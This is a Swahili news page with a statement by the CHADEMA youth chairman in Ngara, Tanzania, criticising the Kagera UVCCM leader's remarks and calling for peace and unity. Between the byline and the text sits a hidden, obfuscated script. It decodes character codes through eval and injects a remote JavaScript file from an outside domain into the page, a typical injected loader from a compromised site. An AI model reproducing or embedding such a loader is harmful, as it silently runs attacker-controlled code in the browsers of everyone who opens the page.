UVCCM Kagera Rudini Jandoni Mkafundwe Upya, Vijana wa Chadema Ngara Hatutishwi na Wagonjwa

By Baraka Bitariho Apr 19, 2024
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Na:- Titho D. Philemon
(M/kiti BAVICHA – NGARA)
Nianze kwa kusema kuwa 4R’s za Mheshimiwa Raisi zimegeuka kuwa miiba kwa vijana wa CCM (UVCCM), sijajua hapo nani anapaswa kulaumiwa kati ya CHADEMA na CCM.
Kwaniaba ya Baraza la vijana wa CHADEMA (BAVICHA) – NGARA ninaomba niujulishe umma kuwa kauli ya Kiongozi wa UVCCM mkoa wa Kagera tumeisikia na ninaomba nimkumbushe kuwa SUKARI na HAMILA vinafanana japo kimoja ni sumu kingine ni kiungo cha chai (WAJITAFAKARI SANA).
Itoshe kusema kuwa Tanzania ni nchi ya AMANI.
KAULI ya kuwapoteza vijana wa NGARA ni ya kiuchochezi na inahatarisha sana usalama wa taifa letu na ni kinyume na katiba ya nchi yetu.
Kwakuwa vyama vyote vinatekeleza majukumu yake kwa mujibu wa sheria basi UVCCM hawapaswi kuwa waropokaji, warudi jandoni wakafundwe upya ili ujana wao kupitia CCM ukapate kulifaa taifa na siyo kuwa hasara kama walivyo kwasasa.
Jeshi la Polisi NGARA, msisikilize wala kuupa nguvu huo upotovu wa UVCCM na badala yake elekezeni nguvu zenu katika kutekeleza kile ambacho sheria zinawapasa kufanya. Tuiombee sana serikali yetu dhidi ya wimbi hili la vijana wenye mawazo ya hovyo.
Kama mkoa utaendelea kuwa na vijana wa namna ya MWENYEKITI WA UVCCM MKOA WA KAGERA basi roho za chuki, siasa za ukatili pamoja na taifa lenye chembechembe za UGAIDI vitegemewe hapo baadae.
Baraza la Vijana CHADEMA wilaya ya Ngara tunaomba vijana wa UVCCM mkoa wa Kagera na taifa kwa ujumla WAJUE WAZI KWAMBA dhana ya kwamba ukiwa CCM una uhusiano wa moja kwa moja na tawala za serikali hata ukivunja sheria NI UJINGA.
Kijana wa kitanzania hapaswi kuwa na akili mgando na badala yake vijana tunapaswa kujijengea umoja wa kitaifa pasipo kugawanywa na itikadi za kisiasa.
DEMOKRASIA MAKINI, KWA TAIFA IMARA!